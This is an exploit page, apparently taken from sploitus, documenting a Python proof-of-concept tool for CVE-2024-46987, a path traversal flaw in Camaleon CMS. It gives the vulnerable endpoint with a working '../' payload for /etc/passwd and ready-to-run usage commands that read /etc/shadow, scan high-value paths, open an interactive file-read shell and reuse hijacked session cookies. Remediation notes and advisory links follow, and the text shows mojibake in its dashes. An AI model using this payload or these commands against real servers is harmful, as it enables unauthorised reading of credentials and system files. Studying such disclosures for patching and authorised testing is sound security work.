Share
## https://sploitus.com/exploit?id=CEF299EB-29DC-55BE-B854-7FCB9F06DE2E
# CVE-2024-46987 โ€” Camaleon CMS Arbitrary Path Traversal

> **For authorised security assessments, penetration testing engagements, and educational research only.**

## Overview

| Field       | Detail |
|-------------|--------|
| **CVE**     | CVE-2024-46987 |
| **Product** | Camaleon CMS |
| **Versions**| >= 2.8.0, < 2.8.2 (also confirmed on 2.9.0) |
| **Type**    | Path Traversal / Arbitrary File Read (CWE-22) |
| **Auth**    | Required (any low-privilege account) |
| **CVSS**    | 7.7 High โ€” `AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N` |
| **Fixed in**| 2.8.2 |

## Vulnerability

`MediaController#download_private_file` passes `params[:file]` unsanitised into `fetch_file`:

```ruby
# Vulnerable sink
fetch_file("private/#{params[:file]}")
```

No path normalisation is applied before the value is used with `send_file`, allowing an authenticated attacker to break out of the `private/` directory using `../` sequences and read arbitrary files that the Rails process has permission to access.

**Vulnerable endpoint:**
```
GET /admin/media/download_private_file?file=../../../../../../etc/passwd
```

## Requirements

- Python 3.8+
- `requests` library

```bash
pip3 install requests
```

## Usage

```
usage: CVE-2024-46987.py [-h] -u URL (--cookie COOKIE | -U USERNAME)
                         [-P PASSWORD] [-f FILE] [-d DEPTH]
                         [--interesting] [--interactive]
                         [--no-verify] [--debug]
```

### Credential-based authentication

```bash
# Read /etc/passwd (default)
python3 CVE-2024-46987.py -u http://target.com -U admin -P password

# Read a specific file
python3 CVE-2024-46987.py -u http://target.com -U admin -P password -f /etc/shadow

# Scan a list of high-value paths automatically
python3 CVE-2024-46987.py -u http://target.com -U admin -P password --interesting

# Interactive file-read shell
python3 CVE-2024-46987.py -u http://target.com -U admin -P password --interactive
```

### Re-use an existing session (from Burp Suite / browser DevTools)

```bash
# Single file
python3 CVE-2024-46987.py -u http://target.com \
  --cookie "_app_session=XXXX" -f /etc/passwd

# Interactive shell
python3 CVE-2024-46987.py -u http://target.com \
  --cookie "_app_session=XXXX; auth_token=YYYY" --interactive
```

### Options

| Flag | Description |
|------|-------------|
| `-u` | Target base URL |
| `-U` / `-P` | CMS username and password |
| `--cookie` | Raw cookie string (alternative to credentials) |
| `-f` | File path to read (default: `/etc/passwd`) |
| `-d` | Traversal depth โ€” number of `../` prepended (default: `10`) |
| `--interesting` | Iterate over built-in list of high-value paths |
| `--interactive` | Interactive file-read shell |
| `--no-verify` | Disable TLS certificate verification |
| `--debug` | Verbose output to diagnose auth failures |

## Notes on `/proc` pseudo-files

Files under `/proc/self/` (e.g. `environ`, `cmdline`) return HTTP 200 but an empty body. This is expected โ€” the kernel reports their size as 0, so Rails' `send_file` streams nothing. Use regular flat files instead.

## Remediation

Upgrade Camaleon CMS to **version 2.8.2 or later**. The patch adds proper path normalisation and ensures that the resolved path remains within the intended directory before calling `send_file`.

Alternatively:
- Normalise all user-supplied file paths before use.
- Reject any input containing `..` sequences.
- Apply the principle of least privilege to the OS user running the Rails process.

## References

- [GHSA-cp65-5m9r-vc2c](https://github.com/advisories/GHSA-cp65-5m9r-vc2c) โ€” GitHub Advisory
- [GHSL-2024-183](https://securitylab.github.com/advisories/GHSL-2024-182_GHSL-2024-186_Camaleon_CMS/) โ€” GitHub Security Lab
- [NVD โ€” CVE-2024-46987](https://nvd.nist.gov/vuln/detail/CVE-2024-46987)

## Disclaimer

This proof-of-concept is published for educational purposes and to assist security professionals in understanding and reproducing the vulnerability in authorised test environments. The author is not responsible for any misuse. Always obtain explicit written permission before testing systems you do not own.